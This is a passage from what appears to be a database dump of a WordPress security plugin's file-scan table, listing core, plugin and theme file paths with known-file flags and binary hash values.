L�\'�6@-�\r�','',0,'?'),('T{��Qmc��7��0\"s','wp-content/plugins/wordfence/css/wf-onboarding.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�Kwt�G��\'�(�','��mǸ�${���&W�>�.{?�Wo�)�=�H�','',0,'?'),('T�.o@Ψ2�w�v��X�','wp-includes/js/jcrop/jquery.Jcrop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/a��Lru�4�\Z�','���Ϸ��yd�ix�{�p+��n�eځ��f�','',0,'?'),('T��ptz3ug�=\\�sF�','wp-includes/wp-includes/sodium_compat/autoload-php7.php',0,'������n��4��','������n��4��','�-��r*H��^��O�<�a{����X�@�g �+','',0,'?'),('T���vm?,�a���T4�','wp-includes/ID3/module.audio-video.quicktime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ր��%���3/�*','Z{��[�W�ڤ�ʑ\nM%9I5+�$3�@^�','',0,'?'),('T���K����oIV�','wp-includes/wp-includes/class-wp-recovery-mode-key-service.php',0,'�9A��l���%<�C','�9A��l���%<�C','����{�Tg�}�E��^�[�Fe�.�','',0,'?'),('T�h�\Z�}ATx���H�','wp-includes/wp-includes/js/backbone.js',0,'\"$2hj32U������','\"$2hj32U������','�c�B�CP\0�F�!���vy6�Ku�*<c�f','',0,'?'),('T���\r�fV�+� j�','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxX��JT��bx���','f��x�/�x��G�\n8�5�6�	Z�+','',0,'?'),('T�>��<�_\"g','wp-content/plugins/wp-cerber/assets/flags/nf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2���rJizڜS��','�P�w�.�^}��\Z�ފڝ3q�{���','',0,'?'),('T�.��)m�&����I','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�41l#}�p���zk1','��h��	�_��֚����!E��4�\Zv��F��','',0,'?'),('T܌�7`\0���(�','wp-includes/js/mediaelement/renderers/vimeo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C9���Y�O���','���+�®-FVp�ݨIht�L�iP%K��i��6','',0,'?'),('U�\\p{J��O�Q�&','wp-includes/SimplePie/Cache/Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ĞA�ʖ�䦴j��','��oO��w��~9K����4oY�[K�e��\\RG','',0,'?'),('U\rԈ�Z�>l���R','wp-includes/wp-includes/SimplePie/Misc.php',0,'��I��\Z��}[�X�rb^','��I��\Z��}[�X�rb^','U�l?l�N�v6�0\'�,��(N��\0�&��','',0,'?'),('U�t]t�A:�ZQ�g�','wp-includes/wp-includes/js/dist/nux.min.js',0,'��G�r�[Ķ��i��k�','��G�r�[Ķ��i��k�','����=cA\"�-3�8��{t-�8 ��h�','',0,'?'),('U*����<�bD�&���','wp-includes/wp-includes/js/dist/vendor/wp-polyfill.min.js',0,'P����$@A.0�Qt','P����$@A.0�Qt','@b�/E�ؔå��;M	�ۙZRİ�x����','',0,'?'),('U6�^���#��g�','wp-includes/wp-includes/block-patterns/text-two-columns-with-images.php',0,'@���N o�F\0�A\n','@���N o�F\0�A\n','cUȫd4�B�nD����Q��n+R��J1e','',0,'?'),('UI�_����Ym���_','wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#�W��P��2oY','�v�����4\'���w��h�<|Z�4Q8�xǃ5','',0,'?'),('U�.��G\0��h7K','wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��Dz��겊��T','s�׷my(�[�~��M������N�Ԙ��;i','',0,'?'),('U� $A=�He�|�zȖ(','wp-includes/Requests/SSL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��������','�}I^L�\\95�N�Y���;�?z��aE=�','',0,'?'),('U�@���dO�a�Եv.<','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',0,'Э�bJ������\r%','Э�bJ������\r%','�*��>}6��?j-9�N�AJ|�r���w�d�','',0,'?'),('U�nɓb4lZ,I','wp-admin/css/about-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=&#��Tk��A=�?','�S���	`4�	:�0�U�h���p���s�ń','',0,'?'),('U�Q�1{�4�/�g��','wp-includes/wp-includes/js/dist/escape-html.min.js',0,'1���~9�(��-{�','1���~9�(��-{�','G�U_�N_xC�`ѳf)�r����s��\Z�\n','',0,'?'),('U�y>��k@�(<LK�','wp-includes/wp-includes/sodium_compat/src/Core/Util.php',0,'��w.�n��7��I���','��w.�n��7��I���','����W��.�3$��^�O�:7za��0A�','',0,'?'),('U���$i\"u��&��9','wp-includes/images/crystal/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l��ڤ�;�=','��S\rI��U��9_<�f`��&HYw�u�','',0,'?'),('V\n��U`�_�5���8','wp-includes/js/customize-base.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��r�#��j	�','LF�#�53��uu��t�F	�չRk*xs_{E','',0,'?'),('V�\r�3#��J��{','wp-includes/sodium_compat/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�7�{(G5��','5<��H���X0���t�>�-�������','',0,'?'),('V#7A�����@�?���)','wp-content/plugins/wordfence/views/unsupported-php/admin-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(`��HMD��A�7�9','y��I~	@V�Y247�&�U��uމ����','',0,'?'),('V2�L��\0ۺ��','wp-includes/js/jquery/ui/controlgroup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�##�=�F=��\\�v','��>733hE}���z�[)�e�Z0�ߨ!�$/Ӿ�','',0,'?'),('V<�_k3&�PC^ı��','wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.js',0,'�j5q��S\rX���i��','�j5q��S\rX���i��','Ej\Z��\Z�I���3J��G�jVݒ��6<S�9P','',0,'?'),('V?�O�N���e�ZF\\�','wp-includes/js/jquery/ui/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������Z����a��','�\"����!f�~xXW��ۜ��4�Ȗ$:��2/','',0,'?'),('VL6�7G^l%D5z3��','wp-includes/default-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�t��<�޸��!�','�^�\'U9�;dOˊSz��!S��m��>I5�\'�e�','',0,'?'),('VUͳD�@(!)2��','wp-includes/wp-includes/js/media-views.js',0,'t	���V\\E�P�[�','t	���V\\E�P�[�','��,���C �A�ERo=4=^��������|','',0,'?'),('Vne!�z0u1?��','wp-includes/shortcodes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'9A�C��zaϥ�2','@o��i\r��������}�8�n���#�\Zق','',0,'?'),('Vrm�KE�p�j��6�','wp-admin/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('V�����댏$�x','wp-admin/js/post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~=��z�!L\Z�DAl�','�js�O�v�W��Ϗ�Sq��������','',0,'?'),('V����rz�(�nol*','wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�T^z[\"��\Zo��','A����_}��Q�\"�gV�UْP��(���6l','',0,'?'),('V�rW��+�v��ӎ','wp-includes/wp-includes/js/utils.min.js',0,'t��0�`ߣ���MVi`','t��0�`ߣ���MVi`','�js�@Vna�v�t\'ȀD��,݆���T;','',0,'?'),('V׀��\'h��Ĉ+:��','wp-admin/includes/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2n�Ֆ[�uj��7','e�M3V\"�d0����/0o���u�T�k��','',0,'?'),('V���1)�~����O','wp-content/plugins/wp-cerber/assets/wrench.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�3�Cb�C-2!�Q�','�;�����մ��xj�E����%Z�P�c��','',0,'?'),('Ws�$8�~��Nȁ-�@','wp-includes/js/mediaelement/mediaelementplayer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�ĪL��5��!\n�','o��^:v\\���m���o����cTW[���k','',0,'?'),('W�Q���4�@�ܯ�7','wp-includes/wp-includes/sodium_compat/namespaced/Crypto.php',0,'�G8�J+��	��z','�G8�J+��	��z','>8���\'X�i�Ub�Gн�,<T`6��4Ѝ�','',0,'?'),('W&�ִ �)+�ڱ���','wp-admin/includes/class-plugin-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z1)i(o+���:','�z��d ��&,T`6BeW���S�w3\\��','',0,'?'),('W8h�!ɩk�ĉ\'�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�RU�b�*��\0\'�','x����<�s��BZ�2�j��RM\'0%$��i{ V','',0,'?'),('Wi*廡�g�7u��w�','wp-includes/wp-includes/IXR/class-IXR-message.php',0,'�J�/�z�*�zͷ�;','�J�/�z�*�zͷ�;','lG\'��r5���+�̔Mh�Shq>��	\0Ϧ','',0,'?'),('Ws��{N�hP�r�㼱','wp-content/plugins/wordfence/lib/dashboard/widget_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kӞw��\"���M��','z�v�l������!1L���+\0�.�i��kIj','',0,'?'),('Wx\Z�Ta��7{��','wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�|��s,�=�K#�','6���ly�6ɦi��3U���,�E[鲓9��','',0,'?'),('W{�g- X��\'=n8','wp-admin/moderation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�EVU��u�������','��Fq�6��1����<���w�t&�b����1��','',0,'?'),('W})Ӗ7���e�}5�9,','wp-admin/load-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i\r|&�Ĉ3�d!ک9�','{��uo�b��jxa��[S\'K&��S�%\nAi��','',0,'?'),('W����DڰS��º�','wp-includes/wp-includes/js/mediaelement/mediaelementplayer.min.css',0,'�	��5�)��k�y�~','�	��5�)��k�y�~','_Dt�3ג�3p��a�;9,�\n�ig���C?3�','',0,'?'),('W��LjN/�@Ϣ�ư�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T	��nr�k���','�;\\��Xځ��/0;��Q�P�.�B4��\Z�','',0,'?'),('W��.���q͟t�ﮊ','wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.min.css',0,'��?4��nT�#���','��?4��nT�#���','�D�ծ6��8g\n)e���z��l�1�MH��&','',0,'?'),('W�w�K\Z\\YE�M�\'l&','wp-includes/wp-includes/blocks/shortcode/block.json',0,'[~ .z\n.a�Y^�h�w','[~ .z\n.a�Y^�h�w','�(��� �̰�bu���e�\nud���l�s&�׵','',0,'?'),('W�J�Z�{X!8l��','wp-includes/wp-includes/blocks/categories.php',0,'&�[sȥ��>JG�^�','&�[sȥ��>JG�^�','��G5�K>�6��Fcf\n��&� �;�t��l','',0,'?'),('W��h��TD�H�d�h�','wp-includes/wp-includes/class-wp-http-cookie.php',0,'`=Y=��3���p*���','`=Y=��3���p*���','�n�<o��%�/�U\"y�\"���)�����B�','',0,'?'),('W��5�Ν�>�_`|��','wp-content/plugins/wp-cerber/assets/flags/py.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����UƸ_��`U��','���s�d��-��ǁ&ǂ��v�	&l:��V','',0,'?'),('X}\Z�`�J]�`�n&�)','wp-includes/wp-includes/images/smilies/icon_neutral.gif',0,'��VM3HU1!�v','��VM3HU1!�v','���Ois8\0�|z��6�]e��@Y�m49','',0,'?'),('X\nelh�o(��wwRM��','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',0,'��\n��|�bA~tb`*','��\n��|�bA~tb`*','�����}͒l>��-A�����T�$��]n','',0,'?'),('X��\\shv]�iB�','wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','݇�(�0,m�G_Y�3','^�)o�B������f�g�*�V�P�?�~��u:','',0,'?'),('X,�E�Cj$_��8I��0','wp-includes/images/smilies/icon_cool.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��`����ivj.�','�事F�9;2_	�$�$~�LO�a��6���_','',0,'?'),('XTr�����#��p#','wp-content/themes/shootingstar/js/html5.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R���T��HC&_�]�N^','���M�P�A:�c��B�]�o����)��K','',0,'?'),('X��M����xڳ�J�','wp-includes/Requests/Hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�� ���gx�i���','�՚���� Q�憐D�P��؂_?y�`�����','',0,'?'),('X�:8+˓2>V]��8�','wp-admin/images/sort-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Aìk�:�bтvFj','\'���aK�\0tGJ�Bq��XW*(J|1���z[(','',0,'?'),('X���v�\Zƒ��\"�$','wp-includes/Requests/Exception/HTTP/409.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�i�~*=����','���_M��8U���.pF����w�:E`�MB��','',0,'?'),('X�s��Yq���ePL','wp-includes/blocks/code/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �2z`������A�%�','W��@\r�8�Q��u�\0H� �WhR��ے0c���','',0,'?'),('X���G������z�X','wp-admin/includes/class-wp-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P=�&��\\��.�_I','��fJ��\n\'-�#?�%�7����{�}\\٤�$�','',0,'?'),('X�~�Vzl!_�]/�-3','wp-content/plugins/wordfence/models/firewall/wfFirewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k(ʫ�ݑ伉����\"','�ڴ��\'��(X�����\"��Ocn,Mq`�D�','',0,'?'),('X��,�P8�ͦ+̫���','wp-includes/wp-includes/blocks/image/block.json',0,'j�s�d\'���+h���','j�s�d\'���+h���','�,)�\Z����Z8��u�A�,i^���bes�t','',0,'?'),('X�k(D��qț��G��','wp-includes/js/jquery/ui/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�U���Ƥ����','��f,p��`��qR��2�\Z^v�6��`��s�$','',0,'?'),('X�xhy�q}�np��B','wp-includes/wp-includes/sodium_compat/namespaced/Core/X25519.php',0,'ڸb��9����M','ڸb��9����M','�F�/\'���M%�9�}@��fW�>��S*�m','',0,'?'),('X�=�2h4�/{�+','wp-includes/spl-autoload-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��u�{�t���','��,�Z\rM	>܅��g�p�/�	Z\Z#`!�.','',0,'?'),('X��Fz��B�8���,','wp-includes/wp-includes/js/jquery/ui/effect-clip.min.js',0,'�G��=�����:�	s','�G��=�����:�	s','��tw�:��o,�u3Mxm���x�H ��gC��','',0,'?'),('X�TCW_^��og��','wp-admin/includes/class-wp-debug-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�:�UJNJt���ѷ','��_�.C��=�v<^(���6�.�Dه� �','',0,'?'),('X�Z`.��ȿ	ʿOm�','wp-includes/wp-includes/atomlib.php',0,'��2*rMb3ы�y��','��2*rMb3ы�y��','��:��8��px� ��������}��)�!�','',0,'?'),('X��6݂\Z���u�k!@','wp-includes/wp-includes/Requests/Exception/HTTP.php',0,'��h���Rlr��','��h���Rlr��','o�E²tQQbo\n����r�Qq��\"�/����','',0,'?'),('Y\nǶ�����8�9','wp-content/themes/sg-window/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�\Z����F��:�','	l�-���\\e9\Z���1߾@\'7�Rm��7','',0,'?'),('Y����bڧ,��J','wp-includes/Requests/Exception/HTTP/405.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8т�m!�Ҭ����','j�b�횄��^U�sv8�$b����M�3y�','',0,'?'),('Y&�6��ڳ��6����','wp-content/plugins/wp-cerber/assets/flags/mg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��;��P�IH\\�','�d|�-uc�P�����V����Oh�`��_','',0,'?'),('Y(�K���g\0��_��','wp-includes/js/dist/annotations.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���gƳ��q_e�f�','��T�Ÿ0�T{�A�B��ɹ����#y!l/{','',0,'?'),('Y,Qp�gmu#�e���~','wp-includes/widgets/class-wp-nav-menu-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8x$�9�hQ&�','n~��B�Ȳ���|�4�[�U�`\0�2�J۷�','',0,'?'),('Y/�ޑ�	���\Z���','wp-includes/js/dist/escape-html.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�V	�����|��','�ʙ���@���\"�}2���#�$�2$D','',0,'?'),('YBt\n�\nc�ݟ.��vi','wp-content/plugins/wordfence/views/diagnostics/text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�R�<�)��Yf�8�','�,�Iq0\r8i;[K.�4?t�\\.ZH\Z','',0,'?'),('YV�2��9}D8�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=on~Z���TOQ�Be','�<�H���\"��F�@����%���1`7<��	��}','',0,'?'),('Yd�{�2_y��}�$','wp-includes/wp-includes/js/tinymce/skins/wordpress/wp-content.css',0,'�����`��Un\0\r��','�����`��Un\0\r��','>���@�:so���X�=��Kd��ku�{�','',0,'?'),('Y�La���h�(','wp-admin/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oۖ���e�y�V�Bnt','���p�S��p>�5��\r��+El�VI��5V�','',0,'?'),('Y�,�e�A��w�`���','wp-includes/images/media/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����h�\0��ì�u','\0�Bb�3��\'��\'��)JG ��](G�9Pr2 s','',0,'?'),('Y�BWy	+�B�Om�z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��:��N�\'�Dx��N','�[��_|А�~E����+�~�E�(�`�_��','',0,'?'),('Y�68�H;%,�_c\n�','wp-includes/css/wp-auth-check.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j��b�u��=�`c','�\r[�B�{\'C�N5zZw� pȈ��I�K�e ��','',0,'?'),('Y�r�҆�M}��\n\0�','wp-includes/wp-includes/js/tinymce/wp-tinymce.js',0,'����--��T�J�;','����--��T�J�;','��O���w�:�V�^�w�^[\n�	L�\'�6@-�\r�','',0,'?'),('Y����]���ŞI���','wp-includes/js/jquery/ui/effect-slide.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;I^�\Z+:C��)H[','Y��� �%��!���d!F��r`�݀��4','',0,'?'),('Y֝��U����}�r/','wp-includes/SimplePie/Cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��~ܯ{ʹ���+h�','�md�����n�nun�pU0 l��6���Zi�R','',0,'?'),('Y�UL�5J�ޔ�v[�','wp-includes/rest-api/search/class-wp-rest-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��x&����{\n�x�\\','�sޢ���zj�λ�\'Ҳ���wE�?��','',0,'?'),('Y�>1�7{6\">�2f*�:','wp-content/plugins/wp-cerber/assets/flags/uy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','txd)b}PJ��kJ@�8','	�ꬬ0�b���\0J��dczE�!(C��P','',0,'?'),('Z�Y�L��崤S+2','wp-includes/wp-includes/functions.wp-styles.php',0,'�GQ\0���[��� �9','�GQ\0���[��� �9','E�Z�H����Ruj�X{L��oy�X`	Y��鈨','',0,'?'),('Z\'��Xz�0�_�Ƚ�T','wp-includes/wp-includes/css/dist/edit-post/style-rtl.min.css',0,'��{J����3=�f�','��{J����3=�f�','w��ko����xv&Aޭ�� T�gޗ���','',0,'?'),('Z(3��8�p �C�yEf','wp-includes/wp-includes/class-simplepie.php',0,'(��\\��Jġ�љ�','(��\\��Jġ�љ�','�8l�n-�	�o�=��8,;h�\'LFR#�ʜB','',0,'?'),('Z+��=�:��O�FI�','wp-includes/wp-includes/css/wp-embed-template.min.css',0,'���n��t�{�hK�','���n��t�{�hK�','/�O��h\nσ��G�����E]<<�u���bh2','',0,'?'),('Z4<n?e�����','wp-content/plugins/wordfence/lib/wfConfig.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����k�P$f��','�ڷ�s,9��a�a�8�ˬ�<�+��p�ql�','',0,'?'),('Z9c�D/˰���}V\'','wp-includes/wp-includes/js/dist/edit-post.min.js',0,'/�):����sL?&��','/�):����sL?&��','�I��R=E\Z��`֚m٪�p\Zt~�#�`I��','',0,'?'),('Z9���}.��J��k=�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I��\Z\n�ӣ�','i>z���R�@������k�W��6u�k�y�','',0,'?'),('ZD�:-h�${�ma�','wp-content/plugins/wordfence/images/sort_desc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?զ�)X�?�N�','b�EԚ�B�#:�(�#�=_(�\Z���|��U�#�','',0,'?'),('ZY�<}���*a�F���','wp-content/plugins/wp-cerber/assets/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��:d�b���EF�R','��z��kG��� �A�Kyh��b��a��h','',0,'?'),('Zp_Z	JI����q�m`','wp-content/plugins/wp-cerber/assets/flags/pa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�Y]�v\"���','���.oC���]1%�lЕ�Ul��\Z������#','',0,'?'),('Zx��1�2K�Z�,��','wp-includes/customize/class-wp-customize-header-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�\0W>$����l�^ҳ','Qy(u�&���v�ӳ\'-�}�hՒ��X��t�','',0,'?'),('ZҌ�[��\nv���	F','wp-includes/SimplePie/gzdecode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��rF<�\ZiǨu��','|��R\'gAE�ێ���q��q�T!��:�O0�_','',0,'?'),('Z�_\"��~�J�����','wp-includes/js/wp-custom-header.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KO��x �3��y;9�','��X$A���\r\"N��e�$ߦ��+���L(','',0,'?'),('Z�~Y/l����*�&�','wp-content/plugins/wp-cerber/assets/flags/vn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f6J%��C���v,\nc','�_���1:�L��v�Q��ܺ�.����|','',0,'?'),('Z��я�ݒ��S�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\Z^Z�HG�%�O�','�m���c�;�\ny㐲��0,�5���F|=�C','',0,'?'),('Z��9Sr�L�[XL�=c','wp-includes/wp-includes/session.php',0,'�NRM��<\\����>��','�NRM��<\\����>��','}����k+8M�U=<;��t����I*,�4#�','',0,'?'),('Z����� %/�Z�z9��','wp-admin/includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/a�ag�����','��	T+�ݟ���v$L�3���G��!�j��','',0,'?'),('Z�\0��Y���� æfg','wp-includes/js/crop/marqueeVert.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0���9��R���','K�cg$�e���2\\p�$�1z�����`CkJ�','',0,'?'),('Z�(�:a��	|�','wp-includes/wp-includes/js/thickbox/macFFBgHack.png',0,'�Ȱg�W�,/u�','�Ȱg�W�,/u�','Rw�/�h��&q��]Z��_����Ngy��','',0,'?'),('Z�R���r(�&b��:�-','wp-includes/css/dist/format-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6���F۔�\'�V��','�h�}����]�ާ֚��$_8Znyi�E�4V����','',0,'?'),('Z��=ӧ�rc\"��y�','wp-includes/IXR/class-IXR-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��VdB+A�J?��#','��{~�(#�\Z6u����,����?�jk2��`','',0,'?'),('Z��4Y+��96*�у','wp-includes/wp-includes/css/dist/block-library/style.css',0,'p>F��ő~���K��','p>F��ő~���K��','fm��e)����$�4�_%��8�R��L��','',0,'?'),('Z���y�4��RZV�VAg','wp-content/themes/shootingstar/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mM�b���I\0� v?�/�','�N`�⧲XqL^�e&\rx�cޙ���E�7M���','',0,'?'),('[�G���e�a\'�i��','wp-includes/js/jquery/ui/datepicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4P1,ٝ�`x����','�]w\'��d�<s��6�>4Sڭ���s��/�=��','',0,'?'),('[\Z*:B��<u��}0','wp-includes/wp-includes/js/wp-emoji-loader.js',0,'�hn�1e��胖��S�','�hn�1e��胖��S�','�,H���w�0�����N<��l�\n�����!��','',0,'?'),('[\'L�F�d�+���k','wp-content/plugins/wp-cerber/assets/flags/li.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�f�9�%��QZ!�;','�`A��/�\\) 5/�����簤��GJ���`�','',0,'?'),('[5���Y�Nh���K�M�','wp-includes/customize/class-wp-widget-area-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<w܌*�t���!�','44�w�Vv�Oa5G��39��I����=�5��i','',0,'?'),('[8�H����{��m<>�','wp-includes/wp-includes/js/tinymce/utils/mctabs.js',0,'끡�\"Y����>xU季','끡�\"Y����>xU季','%�Y}ڿ�&)���MaYg��Ѝ���*�l�','',0,'?'),('[P�@G].�&ag2!�Z','wp-content/themes/sg-window/img/icons/small/linkedin.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v;1���t�^��=V','G:��R�5�6��%z_.�My�y!�P�ë�','',0,'?'),('[n��0,n�|Jnw|/W ','wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.js',0,'��ώ�@�/@M�m�N�','��ώ�@�/@M�m�N�','�xM��\'Ȥ��=�ڷ�?$�S,Fy���֥','',0,'?'),('[w�[ᄅ�\r	|2I�)','wp-content/plugins/wp-cerber/assets/flags/hu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C��.F��L\nc��Q','�g.XaMw�Ma-#lW���=���h��1�U�h','',0,'?'),('[��#ܧ\Z>]��<�','wp-admin/css/colors/ectoplasm/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1/�?n�.�EL�-��','t$�yC�\0.J���.�O��}��\"g�=�','',0,'?'),('[�>�x�;�wn/t�H','wp-includes/js/wp-emoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+g�D>�w�f�م*�D','M�aF��$�*�M��_�����n8���v�u�','',0,'?'),('[��$c�qr��9h���','wp-content/plugins/wordfence/js/jquery.qrcode.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('[���1�YAdk�,','wp-includes/SimplePie/Sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�l����fp��x��','���O\nQp���5�A�~������j��xt�','',0,'?'),('[�Y��44�Or��l0�','wp-includes/Requests/Exception/HTTP/414.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]U�@���)��#h','��H������i���c�!��I).eh������','',0,'?'),('[ꠏ�|K�o�یb7�','wp-admin/user/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xCS6�LC�2!�u�','�`K����y2M��plξ\"a\0אּ�t�ޡD','',0,'?'),('\\�%�?�>����e8','wp-includes/class-wp-block-pattern-categories-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��i���詿/�!','��(Y�E�U��<d�y���K	2�bsy�Z�L�','',0,'?'),('\\�����9�����','wp-admin/ms-upgrade-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qc��8���E�%��!','	